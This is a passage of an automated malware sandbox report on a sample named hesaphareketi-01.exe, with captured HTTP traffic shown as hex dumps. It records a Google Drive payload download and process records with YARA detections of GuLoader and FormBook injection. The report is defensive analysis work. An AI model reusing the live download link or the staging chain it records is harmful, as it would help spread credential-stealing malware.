61 59 66 2f 36 4e 50 72 68 43 31 2f 39 33 53 41 34 6e 58 4e 77 48 62 2f 7a 56 49 38 56 49 61 78 31 51 36 50 36 69 70 2b 4c 43 66 66 47 6b 41 7a 36 30 45 6f 4b 51
                                                                                    Data Ascii: 9pG0L=TkZvAvBd3hCcmSn19sos1f+VBOs+nOZUGp54rvKXDucrFv7L6ZiAk1lF99HJFJV5xhAp828QW2aEue2CrueKwFxPyIozGU7F1XFdcfkvpDcVkF8drpgnbmMex89KDHYvji6SmcE4ewDwkVQ+RKKuRwPjs4lfk10/9tSlgK91LGtH88QPbPWy4hY7kR0JaIXVbcvqxzm76zNuZzHP2xG8XI3aFof5fa3R1Y9TOukHXaBh7Ht1VX4l8vmMalDj0Z0SVPzVoLKGWZoKMyg8yBiW1eRphG1OoGZVHsnZklpGnA6hna5eWHnAa9cd6vf1XNwVJYfxfdp/ntUpTB0mD+PEou5bhOkluU9sDKikZnd2eNpJWDFAd9Yaf+ZJNCMVZ/wDXYQ/FnCxBJsq1t7JBfqlm0IvarbHLD4iZm9gy9gt+3vmccg8WhzxkZT3pHALHL+eaMdYWosNJYYo6zCW1acLgIcV5qQyJHuFLCsiG/R0ZYeyS1yWcYo36scv5f4f1/gMNQSySpsieYNwF7wN5ZsOWMT9wICKznPMkfKilcTNI+De956K1KSeIIbUKCJFkYgVskjTnrkoDRAi23tOnxPN/PHAz3RT9lJ66PkA1m5PdMfjiTEEtyPbE52fQGFg4yu+mvBV0ldRq6QgE3i6RuBXsWvdsEG94NcJ7Yacc3QtkqxjVtPLv99BNnqgckcxe1CAIOkfAZ0Jcuemt0f7/Pcg375zUeIVK+7nw8dhi5bRw05X4A/n1dq6u6oxja/R52vrsGzbW6b65Nn7uQbSDkPq/jwQGvxuLdp7rrUfJF4KOU1lJqAl9b7HeDwZ4iQe3r/PpINfGEK5Nj+zkegzWIqi4pSUAtsCJxpxymzHTiqQmt1SMtHbgHYvadO8mv1iMmvhITsQQEbq/ZAMVDmTc7sjfLAN1oay3mixRe3shnPwx3R/TyY9AKYI0bg2sf0g5/mnqf1ld6Xia0zH3QNaWWEO0Pg59C/OkuWh8ew9fITIhYykvQquF8WRybm07/pHuBfSCI06QGTbbQKn3sHhTazBMvoS27Ol8pQIagMWr8aYf/6NPrhC1/93SA4nXNwHb/zVI8VIax1Q6P6ip+LCffGkAz60EoKQ
                                                                                    Dec 4, 2023 12:10:53.463102102 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:10:53 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.11.3049744142.250.65.1744431380C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2023-12-04 11:03:14 UTC216OUTGET /uc?export=download&id=1ZIshcel7UMzwz8rXT4KX5lfic62QjZtZ HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
                                                                                    2023-12-04 11:03:15 UTC1732INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 33 20 53 65 65 20 4f 74 68 65 72 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 62 69 6e 61 72 79 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 34 20 44 65 63 20 32 30 32 33 20 31 31 3a 30 33 3a 31 35 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 67 2d 61 67 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65
                                                                                    Data Ascii: HTTP/1.1 303 See OtherContent-Type: application/binaryCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 04 Dec 2023 11:03:15 GMTLocation: https://doc-0g-ag-docs.google


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.11.3049748142.251.40.1294431380C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2023-12-04 11:03:16 UTC408OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/afsc4ag5uqa5maj4frjtgk9skbeu3peo/1701687750000/14166578405435855174/*/1ZIshcel7UMzwz8rXT4KX5lfic62QjZtZ?e=download&uuid=e13d7ba5-3bd0-48f6-b701-0767cd5a3c67 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                    Cache-Control: no-cache
                                                                                    Host: doc-0g-ag-docs.googleusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2023-12-04 11:03:16 UTC4430INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 58 2d 47 55 70 6c 6f 61 64 65 72 2d 55 70 6c 6f 61 64 49 44 3a 20 41 42 50 74 63 50 70 49 46 68 61 44 6a 77 59 49 63 77 4e 62 69 7a 6b 66 4e 4a 30 44 4d 57 35 34 77 37 4f 51 30 61 68 54 5f 35 63 64 51 38 51 56 38 75 30 59 31 58 71 47 57 56 63 63 7a 44 72 36 57 73 54 64 75 4d 51 51 2d 56 79 62 48 4e 42 38 61 79 4d 2d 78 46 69 74 55 34 63 41 79 41 75 34 50 68 4e 62 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65
                                                                                    Data Ascii: HTTP/1.1 200 OKX-GUploader-UploadID: ABPtcPpIFhaDjwYIcwNbizkfNJ0DMW54w7OQ0ahT_5cdQ8QV8u0Y1XqGWVcczDr6WsTduMQQ-VybHNB8ayM-xFitU4cAyAu4PhNbX-Content-Type-Options: nosniffContent-Type: application/octet-streamContent-Disposition: attachment; filename
                                                                                    2023-12-04 11:03:16 UTC4430INData Raw: 52 d4 a1 c1 40 61 49 1f 8a 76 1c 6f b1 d5 fc f9 3b 1d 9b ed 97 52 05 c8 8f 75 6d 68 22 7d 14 da 42 0f 62 0b 51 d6 fd 6b 54 40 60 b8 52 47 ea a2 15 2e cb f8 ab 78 cb 71 d9 2e a8 16 51 1e 2d 51 ec 83 be c3 d0 d0 81 53 f9 4b bf 81 ea ab 84 8a 1a 38 03 6b 6b d2 34 a3 b2 8e 05 97 9c 01 f7 2b 78 91 2b 85 c8 72 41 bf 47 e7 99 64 5f 51 8d 14 4f 73 92 ae 3f 31 16 64 43 b5 90 10 40 ee be 18 94 dd 71 b3 0c a7 f3 07 99 87 1b 05 46 8d 3d 9f 96 0a 9f 1a 56 d2 0c 84 a6 ed 17 18 21 a6 aa c6 04 d0 d2 c7 de ec 73 61 bb f6 af 4f 9d 34 ac 45 36 0b 18 47 a7 8b 81 bd d3 6c be 76 78 e1 58 83 a8 02 e8 1e 44 cd 42 df 87 6b 91 de ec e5 17 72 89 84 7b 28 9e e2 e5 a7 7e 26 9b 2d ee fb 0c c7 a6 2a 60 69 ca a4 3b f7 77 f6 2f d4 99 c7 46 5b 5f c2 c0 04 77 5e a9 43 94 1d 1e 34 1a 27 56
                                                                                    Data Ascii: R@aIvo;Rumh"}BbQkT@`RG.xq.Q-QSK8kk4+x+rAGd_QOs?1dC@qF=V!saO4E6GlvxXDBkr{(~&-*`i;w/F[_w^C4'V
                                                                                    2023-12-04 11:03:16 UTC4430INData Raw: ce f3 52 d3 5e 06 26 7d 9e 94 8e bb 2c 81 a2 d8 90 7b 4c 3f fa cc f5 f4 d8 7f c1 49 0f 18 2c 79 85 86 de 1e dc 04 f1 49 f1 f1 ef 12 c8 1a bb 0a d1 d4 34 e8 ea 99 6b b5 aa c7 94 f2 85 52 7b 82 6f d4 ab 8c a6 de 5e ce f4 1b 1c d1 32 49 86 81 9a 63 dd 27 37 0f ec 1d be df fc 6b 70 5a 09 30 88 6a 69 0d 30 5c ce a5 72 d3 b0 0b 39 ab eb c9 59 7a d6 70 1f 1f 63 69 f1 c7 8f d3 a7 69 60 c3 ab 27 b4 b0 cf 61 2c 43 db 6b 35 3a 00 b2 0e e7 ec 7a d9 3b 53 f6 ff 62 e8 ea 75 30 8b 58 1d 23 fe 61 e7 8f 97 ee 28 dd db cc 47 48 fa de ee 7a 68 b7 9b b0 aa 7b 1c 3b b3 24 60 ab e2 9c b7 e7 0c d2 69 cf 49 f2 7d 88 4b c5 e0 2d 02 52 eb 5e 8a db fe 73 ea b4 58 0f be be 33 37 fb cc 6a a7 41 05 07 2c 44 23 68 d4 a4 83 fd 5d 73 df 26 d8 f0 17 d4 b7 ee 3f c4 58 bf 5e 9a 1c 8a 80 ea
                                                                                    Data Ascii: R^&},{L?I,yI4kR{o^2Ic'7kpZ0ji0\r9Yzpcii`'a,Ck5:z;Sbu0X#a(GHzh{;$`iI}K-R^sX37jA,D#h]s&?X^
                                                                                    2023-12-04 11:03:16 UTC2769INData Raw: 4e c8 1f b7 8a 09 9c 0e df ae 79 6b 91 13 0d 7b 37 35 32 71 ac da dd cc 8e b0 33 7c 1a 49 e0 e2 f0 e1 b0 07 4b c3 8a ff 5f c9 02 29 1e 03 7d 43 85 53 f5 a5 4b 08 03 89 b8 02 4b e5 04 33 a0 63 46 88 9b 9f a9 85 db 60 47 02 1c 02 38 18 83 21 b0 04 06 93 d6 bb 64 c9 c8 2f 68 c8 a2 10 cd 80 21 93 b2 99 ee ee ec 3e 32 34 27 10 54 1a b9 41 28 e5 58 87 2c 2f 53 c8 7a ff f0 43 d4 82 7d 0f 4b c2 e1 1f db f0 6e 35 3a 6d 31 4d 2f 19 5f eb b7 44 75 51 0a fe 6f 3b 14 16 06 dd 2b 98 01 b5 32 fd be d1 98 47 31 93 6e 80 25 ef ca ce 6c 4e da d0 0b 87 50 46 dd 69 57 4e f6 3b a5 5b bd 5d 15 1e 6d ed 38 e3 a9 2a 5a 77 90 38 d0 0b 53 cb d2 b4 2d dd df 77 ba 72 07 88 6b 1a aa 3c 2e 56 08 c4 1c 6b 29 24 66 1a 81 dc 6c 09 88 42 34 8d 26 70 7b 5c 9b f8 f9 c6 3e 5e 25 72 f1 93 ad
                                                                                    Data Ascii: Nyk{752q3|IK_)}CSKK3cF`G8!d/h!>24'TA(X,/SzC}Kn5:m1M/_DuQo;+2G1n%lNPFiWN;[]m8*Zw8S-wrk<.Vk)$flB4&p{\>^%r
                                                                                    2023-12-04 11:03:16 UTC1252INData Raw: e1 5e 06 66 c3 cb ed 81 f4 92 30 5e 6a eb 01 3d c8 cd 54 cf e8 6e 8e 72 7f 1c df 5d a5 cf a7 00 f4 19 72 d0 b7 49 70 29 b3 4f ee 53 8f 18 a0 06 bf d7 97 59 18 19 4d 96 73 5c 97 90 c0 df d5 18 97 01 a4 ec c3 61 65 be f8 49 b7 db 74 5b 8c bf 38 46 85 42 2e 56 b3 fb 6b c9 8b 70 35 c0 79 9a 04 7f 66 3e ae 86 d0 39 5a 62 f6 54 a2 a8 1d 08 2f f7 0b 36 66 d9 fc 76 5a ee 62 49 35 b7 e6 f5 90 da b3 7e 98 47 49 cc 12 d4 73 56 98 79 39 06 b4 87 fd 97 5f 5f 41 dd a5 d4 2e 3d d7 c1 85 e7 8e 97 51 00 7d 91 33 7f f2 35 56 25 ae 26 70 de c5 37 37 a4 5c 3d 77 f8 a3 f3 de 89 ed 3e 4e 98 21 56 49 28 35 c1 2b de 85 8a 42 0f a7 8c 50 b4 cb 06 e3 d8 0d 37 15 c7 49 70 86 59 26 b8 75 69 94 5b 2d d5 d6 88 62 8a 23 6a b0 29 e6 e1 0b 92 b1 16 5f a9 e3 4c 66 d0 72 45 e9 86 57 52 4f
                                                                                    Data Ascii: ^f0^j=Tnr]rIp)OSYMs\aeIt[8FB.Vkp5yf>9ZbT/6fvZbI5~GIsVy9__A.=Q}35V%&p77\=w>N!VI(5+BP7IpY&ui[-b#j)_LfrEWRO
                                                                                    2023-12-04 11:03:16 UTC1252INData Raw: da d6 f0 f2 8d 68 1a bf e9 bf e5 62 3c 7e da 35 94 65 fd a6 8c ff 86 7e b0 44 32 b6 3b b5 34 08 d2 ca 00 33 8b 3f 35 16 8f eb 9e 3a 8c 13 7d 58 8a d4 ef 94 a9 56 98 d6 cc 1e 12 3e d4 e2 5f 36 96 d4 89 53 2a 57 08 5d f6 1f 3d 0b 40 cd 39 88 a0 ce 31 dc fb d7 4f 41 dc 54 cb ae 45 c5 75 dd e1 c2 9d 3e 37 96 a5 6a 29 28 8d ce 82 ac 1a 8e d6 3a 9f 04 6b b2 86 45 28 1e f7 2f 6b a5 70 1c 18 2d 0c ec d1 87 7e e3 5b 73 29 26 28 5d 68 52 83 29 12 80 1e 96 7e 7e 59 da a5 5e 97 4f 6c 5f c3 ae 55 19 3f 9e 21 a6 b8 7a 3a 24 40 e1 a9 03 30 4b bc ea 09 96 87 62 dc 05 02 b8 61 7d 18 e3 01 10 87 d9 c6 be f5 09 6d 86 dc d8 b8 90 cf d2 08 2c 5b 04 02 01 15 88 50 1c c8 c5 50 e5 8c 75 fc 4b 49 01 f5 11 2c d0 ef 28 de 76 3a 69 01 51 e9 28 08 5a 46 ea 35 fa 21 ad 26 df 2d 30 09
                                                                                    Data Ascii: hb<~5e~D2;43?5:}XV>_6S*W]=@91OATEu>7j)(:kE(/kp-~[s)&(]hR)~~Y^Ol_U?!z:$@0Kba}m,[PPuKI,(v:iQ(ZF5!&-0
                                                                                    2023-12-04 11:03:16 UTC1252INData Raw: 93 92 1e 33 19 e6 74 41 e6 84 b1 05 8f d9 22 86 12 41 da cf 84 ff af 67 10 c1 e6 19 80 c1 9c 1f 20 08 2d 78 5d b3 28 e5 a4 2e 11 d1 00 58 a5 14 f9 08 ed 82 f4 e5 54 ad 52 f0 3a bc ec 59 65 79 41 26 d2 a5 14 a4 f6 b7 2c 73 c2 78 d1 cd b2 d9 65 7e 17 1c f8 1e 67 6e 8b e9 1b be 6f 39 43 44 d9 66 40 1f bb 2d 4e a8 50 e8 85 7e 39 7c 4e 46 f8 d3 8f 7d ff e6 1d b3 2f b6 42 41 79 16 e9 00 4d e3 5a 50 89 0f 86 8b 4c e7 41 c7 8c 64 a4 44 b0 f2 7c 83 b9 b7 f6 3f 54 a4 66 97 1e f0 f1 2b ab f5 e9 94 3f 28 7d d2 de 95 9d 1e 00 20 91 7a 83 9c 1a ff ee 9b 7f 7c 2b cf c3 4c c3 64 d1 15 38 0a 8b 5e a5 34 cc 0a 7c e1 6d 1b d0 b8 84 eb 5a 7a 40 11 ff 59 7d b8 15 c6 d6 d9 98 d5 47 cb a4 8b d4 b5 42 4e 7d 23 81 e7 e4 75 3f 4b ec cb 46 07 06 3a 66 a9 ef 70 3f 67 e4 4f fd 6a 5b
                                                                                    Data Ascii: 3tA"Ag -x](.XTR:YeyA&,sxe~gno9CDf@-NP~9|NF}/BAyMZPLAdD|?Tf+?(} z|+Ld8^4|mZz@Y}GBN}#u?KF:fp?gOj[
                                                                                    2023-12-04 11:03:16 UTC1252INData Raw: a1 0b 0a 50 8e fa ff 62 60 54 d6 93 ff 11 63 65 c9 fa 2a 10 bd 5d ea 5c e4 2a ed 09 fb 8a c5 f1 60 27 0d ab b5 d3 53 d5 03 24 48 e1 fd 79 e7 3c 8d 16 86 a4 06 88 11 df 54 2b fa 4d 81 2c 6c 58 fc c7 a2 d1 b2 5b a2 0c 65 1f 8c 62 0f ad ab 73 6b ef 76 a7 7f 9b ee e8 d0 69 92 85 df e3 19 35 25 5f 29 bb 86 1d d8 5c e4 fa 82 0b ef 06 ee 7a 97 ec 6f 3d b9 fb 75 fa 6d 61 48 36 67 52 29 96 4b 98 80 f1 31 06 a7 d7 b3 aa d6 c9 5b c9 88 41 f4 cc 2d ab 06 7a 79 91 3e c1 0a f8 2a 37 58 fb c5 25 62 84 9f ae e0 86 2d 9f f5 86 e7 8b 4f fe 78 c8 e7 cc c9 6d 1d bd 78 c5 77 41 0d 3e 2a 00 f4 be 49 55 0f 93 e8 c6 b3 57 b4 d5 30 bc de 37 76 4a 17 3d fe 0f 99 81 b1 b8 03 3f f4 2d 58 3e 90 b0 68 10 37 af 5d 74 cc ea d8 c8 e6 31 5e 69 8d 71 01 59 1b 03 df c2 10 0f 46 26 bd d1 40
                                                                                    Data Ascii: Pb`Tce*]\*`'S$Hy<T+M,lX[ebskvi5%_)\zo=umaH6gR)K1[A-zy>*7X%b-OxmxwA>*IUW07vJ=?-X>h7]t1^iqYF&@
                                                                                    2023-12-04 11:03:16 UTC1252INData Raw: ef 91 98 92 16 8e 0a e8 59 86 05 e2 42 9e e8 90 c0 5b 53 4d 0a ee 11 c0 35 bc ea 8d e5 36 84 52 15 43 a2 df 36 a3 a5 5d 07 4e ed c0 fb 04 c2 22 04 35 56 63 07 89 5f a4 18 04 31 05 2b 12 45 bf 70 8c b9 d4 00 f4 ac 07 19 f1 f4 97 6f 00 f7 7b b0 6f 74 d9 8b 99 9c c5 25 7d 00 20 f9 9f 9f 31 23 31 a1 c3 95 55 de 49 9c 98 1c 6a 41 59 54 0c 09 8e 11 33 52 29 bb 2d a0 48 7c 2d 4f fc 09 e5 58 31 51 63 d3 b4 14 62 bc ae fc 92 b9 c7 9c 3d 92 70 66 04 0a 3c 44 ad 6e 3c a7 c9 f6 90 d5 e2 71 b5 45 7c ec 87 21 ff 20 ef d0 de d2 fd 44 67 0c 26 70 ca b1 54 cb 0b a9 f7 75 d0 be 16 b2 e0 17 f6 39 d0 59 b1 af 64 91 f9 44 b4 0d 89 3e 6e 4e 71 fa 9e 2f 72 ad 6e 73 7c e2 3b 5f 56 bf 4c 3d 1c 48 e5 ae 3f 9b 34 d8 b2 f8 76 3c ae 19 b4 3a e1 e4 33 55 3c 27 74 25 c5 e6 61 68 c3 e9
                                                                                    Data Ascii: YB[SM56RC6]N"5Vc_1+Epo{ot%} 1#1UIjAYT3R)-H|-OX1Qcb=pf<Dn<qE|! Dg&pTu9YdD>nNq/rns|;_VL=H?4v<:3U<'t%ah
                                                                                    2023-12-04 11:03:16 UTC1252INData Raw: a1 fa eb 89 65 b9 ee ad 3a 4c 9c 44 99 b6 ad c3 b1 35 cd 15 4a ee 6a c0 35 45 af 69 4d 7a f1 0a 5d 4e 6e 81 65 e4 15 88 28 84 a2 fc 0a 84 86 a9 77 ab 3c 68 90 52 05 15 cf 10 30 5c da d1 84 44 ab 25 e8 a7 05 6f 23 71 4c 42 87 fa 3e be 97 12 16 b8 b3 a5 66 49 c1 6c 10 4d 43 2d a1 c0 5c bf 88 5f 89 07 79 fb 40 31 02 d8 52 9d 86 ce 6d ed 0d 1d 52 e2 ca fd 10 a6 50 05 30 86 66 c1 91 2d 22 92 ec 62 38 ff b5 52 8b bf c5 6c 09 7e 09 d8 6c f7 52 76 73 67 59 c5 54 4b 55 97 b6 a2 a7 ba 70 91 0e 5e d5 a5 10 c0 33 90 49 80 aa 02 ca c8 61 a1 60 54 c1 34 26 ef ea 2f 41 6d 41 97 29 19 6f b0 17 6f 0a 6a 7d f8 0a 55 ca b9 24 3d a6 0b de 57 32 97 22 78 7e ed 33 54 37 a6 57 70 c5 73 29 fb 86 0f 1d b4 cd cb 5f ae af 85 8c 3e 9d 51 75 91 02 42 e4 7d c6 d2 2d 06 cd 01 71 80 f1
                                                                                    Data Ascii: e:LD5Jj5EiMz]Nne(w<hR0\D%o#qLB>fIlMC-\_y@1RmRP0f-"b8Rl~lRvsgYTKUp^3Ia`T4&/AmA)ooj}U$=W2"x~3T7Wps)_>QuB}-q


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:12:02:17
                                                                                    Start date:04/12/2023
                                                                                    Path:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:368'795 bytes
                                                                                    MD5 hash:E96BD1C59A8E67C4AB01A9327C98AAB7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1273244307.000000000078C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1275057239.0000000008E1E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:12:03:02
                                                                                    Start date:04/12/2023
                                                                                    Path:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:368'795 bytes
                                                                                    MD5 hash:E96BD1C59A8E67C4AB01A9327C98AAB7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:12:03:16
                                                                                    Start date:04/12/2023
                                                                                    Path:C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe"
                                                                                    Imagebase:0xca0000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.5796633331.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:12:03:18
                                                                                    Start date:04/12/2023
                                                                                    Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                    Imagebase:0x80000
                                                                                    File size:340'992 bytes
                                                                                    MD5 hash:7C22FED393CA0330A10B47848018C225
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.5795631450.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.5795764214.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:20
                                                                                    Start time:12:03:41
                                                                                    Start date:04/12/2023
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                    Imagebase:0x7ff73bdd0000
                                                                                    File size:687'008 bytes
                                                                                    MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:25%
                                                                                      Dynamic/Decrypted Code Coverage:14.1%
